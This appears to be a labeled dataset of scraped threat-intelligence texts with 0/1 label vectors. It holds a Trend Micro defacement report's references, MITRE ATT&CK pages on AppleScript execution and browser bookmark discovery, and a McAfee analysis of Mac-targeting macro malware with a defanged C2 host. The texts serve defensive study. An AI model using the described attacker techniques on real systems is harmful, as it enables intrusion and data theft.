Last accessed on 20 November 2017 at http://www.ibtimes.co.uk/team-poison- phone-bomb-hacker-anti-terror-367660. 38. Spencer Ackerman, Ewan MacAskillin and Alice Ross. (27 August 2015). The Guardian. \xe2\x80\x9cJunaid Hussain: British hacker for Isis believed killed in US air strike\xe2\x80\x9d. Last accessed 16 November 2017 at https://www.theguardian.com/world/2015/aug/27/junaid- hussain-british-hacker-for-isis-believed-killed-in-us-airstrike. 39. India Defense News. (7 October 2016). India Defense News. ""\xe2\x80\x98Patriotic\xe2\x80\x99 Indian Hackers Lock Pakistani Websites and Refuse to Give Back the Key"". Last accessed on November 17 at http://www.indiandefensenews.in/2016/10/patriotic-indian-hackers- lock-pakistani.html. https://github.com/offensive-security/exploit-database https://github.com/offensive-security/exploit-database http://www.ibtimes.co.uk/team-poison-phone-bomb-hacker-anti-terror-367660 http://www.ibtimes.co.uk/team-poison-phone-bomb-hacker-anti-terror-367660 https://www.theguardian.com/world/2015/aug/27/junaid-hussain-british-hacker-for-isis-believed-killed-in-us-airstrike https://www.theguardian.com/world/2015/aug/27/junaid-hussain-british-hacker-for-isis-believed-killed-in-us-airstrike http://www.indiandefensenews.in/2016/10/patriotic-indian-hackers-lock-pakistani.html http://www.indiandefensenews.in/2016/10/patriotic-indian-hackers-lock-pakistani.html \xc2\xa92018 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners. TREND MICROTM Trend Micro Incorporated, a global cloud security leader, creates a world safe for exchanging digital information with its Internet content security and threat management solutions for businesses and consumers. A pioneer in server security with over 20 years experience, we deliver top-ranked client, server, and cloud-based security that fits our customers\xe2\x80\x99 and partners\xe2\x80\x99 needs; stops new threats faster; and protects data in physical, virtualized, and cloud environments. Powered by the Trend Micro\xe2\x84\xa2 Smart Protection Network\xe2\x84\xa2 infrastructure, our industry-leading cloud-computing security technology, products and services stop threats where they emerge, on the Internet, and are supported by 1,000+ threat intelligence experts around the globe. For additional information, visit www.trendmicro.com. Created by: The Global Technical Support and R&D Center of TREND MICRO www.trendmicro.com A Deep Drive into Defacement Contents Introduction Our Approach to the Investigation Targets and Methods of Website Defacers The Role of Social Media Real-World Conflicts Reflected in Cyberspace Conflicts Spark Anti-Israel Defacement Campaigns Target TLDs of #OpIsrael Defacements #OpIsrael #OpIsrael Sub-campaigns #OpBader / #ElectronicBader / #BaderOperation #OpSaveGaza #Save Gaza Groups behind the Campaigns Charlie Hebdo Aftermath Results in #OpFrance Target TLDs of #OpFrance Defacements Groups Behind the Campaigns Indian Border Disputes Trigger Campaigns Target TLD\xe2\x80\x99s of #OpIndia Cricket leads to #riseofthetigers Free Kashmir Nationalism Inspires Retaliatory Hacking Fallout of the Attacks between India and its Neighbors Groups behind the Attacks Military Actions prompt a #SaveSyria Campaign Target TLDs of #SaveSyria Campaigns Provoked by Kosovo Disputes Disputes in the South China Sea OpPhilippines and OpTaiwan Defacements over Territory Early Attacks in 2011 OpChinaDown, 2012 StopReclamation and OpChina, 2015 Attacks on Vietnamese Airports, 2016 Hacking Groups\xe2\x80\x99 Connections and Campaigns Collectives Campaign Recruitment and Tools Auxiliary Activities of Defacement Groups Escalating into Real-World Terrorism Activities Defaced Sites as Unwitting Infection Sources Conclusion Web Defacements and IoT Hacktivism in the Future How can enterprises protect their sites? References","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"AppleScript - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise AppleScript AppleScript macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python [1]. Scripts can be run from the command-line via osascript /path/to/script or osascript -e ""script here"". ID:\xc2 T1155 Tactic: Execution, Lateral Movement Platform:\xc2 macOS Permissions Required:\xc2 User Data Sources:\xc2 API monitoring, System calls, Process monitoring, Process command-line parameters Supports Remote:\xc2 Yes Version:\xc2 1.0 Mitigations Mitigation Description Code Signing Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing. This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper. [2] Examples Name Description Dok Dok uses AppleScript to create a login item for persistence. [3] Detection Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system. References Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017. Steven Sande. (2013, December 23). AppleScript and Automator gain new features in OS X Mavericks. Retrieved September 21, 2018. Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018. Copyright \xc2\xa9 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation. Privacy Policy Terms of Use @MITREattack Contact","0","1","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Home / Other Blogs / McAfee Labs / Macro Malware Targets Macs Macro Malware Targets Macs By Yerko Grbic on Feb 14, 2017 Macro malware has been spreading for years. New techniques arise all the time to hide malicious code and thus increase the difficulty of analysis. However, just targeting Microsoft Windows no longer seems to be enough for the malware authors. The Mac appears to be the new challenge, and attackers appear to be rising to this challenge. In previous versions of macro threats, the malicious code was hidden in user forms and macros in Microsoft Office files. (See Macro Malware Associated With Dridex Finds New Ways to Hide.) The latest member of this family seems to have learned a new trick or two, as we now will see. The malicious code is now hidden in the properties of Excel worksheet files: A malicious Excel file ready to be executed. When the file is opened we see this message. If we access the file\xe2\x80\x99s properties, we can read the Powershell script code. The full content in Properties. Location of hidden content. An extract of the Powershell content. The malicious code runs Powershell, which downloads malware after the victim enables macros. The macro searches for the hidden code in Properties and runs it using Powershell, but this works only on Windows systems. How does the malicious code execute on the Mac? The malware developers use MacScript: The macro code verifies whether WScript.Shell is present. In case of an error, the code executes the module macshell: This script runs the code on the Mac. The script runs with the same permissions as Microsoft Office. As we ran this analysis, the control server contacted by this malware sample was not running; so we were unable obtain the payload. The MD5 hash for the samples we found: 952A36F4231C8628ACEA028B4145DAEC Full descriptions of the W97M and X97M malware families are available in our Threat Advisories: W97M/Downloader and X97M/Downloader Threat Advisory During our analysis, the malware attempted contacted the following server (with URL modified for safety): hxxp://ndur0.net McAfee advises users to keep their antimalware signatures up to date at all times. McAfee products detect this malicious Office Trojan as X97M/Downloader.bf. Previous ArticleNext Article Categories: McAfee Labs Tags: Apple, computer security, cybercrime, cybersecurity, malware Leave a reply Facebook CommentsComments (0) Similar articles Solving the Gamer\xe2\x80\x99s Dilemma: Security vs. Performance By McAfee on Sep 17, 2019 Are Cash Transfer Apps Safe to Use? Here\xe2\x80\x99s What Your Family Needs to Know By Toni Birdsong on Sep 14, 2019 Millions of Car Buyer Records Exposed: How to Bring This Breach to a Halt By Gary Davis on Sep 12, 2019 Subscribe to McAfee Securing Tomorrow Blogs Email Address Email address Corporate Headquarters 2821 Mission Colledge Blvd. Santa Clara, CA 9505 USA Business Cloud Security Endpoint Security Security Operations Data Security Consumer Hackable? Podcast Consumer Threat Notices Family Safety Identity Protection Mobile and IoT Security Other Blogs Podcast McAfee Labs Executive Perspectives Life at McAfee McAfee Partners Languages Italia \xe4\xb8\xad\xe5\x9b\xbd Espa\xc3\xb1ol Fran\xc3\xa7ais German Portugu\xc3\xaas \xe0\xb9\x84\xe0\xb8\x97\xe0\xb8\xa2 Copyright \xc2\xa9 2019 McAfee, LLC","0","1","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Browser Bookmark Discovery - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise Browser Bookmark Discovery Browser Bookmark Discovery Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials in Files associated with logins cached by a browser. Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases. ID:\xc2 T1217 Tactic: Discovery Platform:\xc2 Linux, Windows, macOS Permissions Required:\xc2 User Data Sources:\xc2 API monitoring, File monitoring, Process command-line parameters, Process monitoring Contributors:\xc2 Mike Kemmerer Version:\xc2 1.0 Mitigations This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Examples Name Description Calisto Calisto collects information on bookmarks from Google Chrome. [2] Empire Empire has the ability to gather browser data such as bookmarks and visited sites. [1] MobileOrder MobileOrder has a command to upload to its C2 server victim browser bookmarks. [3] Detection Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as Windows Management Instrumentation and PowerShell. System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. References Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. Kuzin, M., Zelensky S. (2018, July 20). Calisto Trojan for macOS. Retrieved September 7, 2018. Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016. Copyright \xc2\xa9 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation. Privacy Policy Terms of Use @MITREattack Contact","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Image File Execution Options Injection - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware 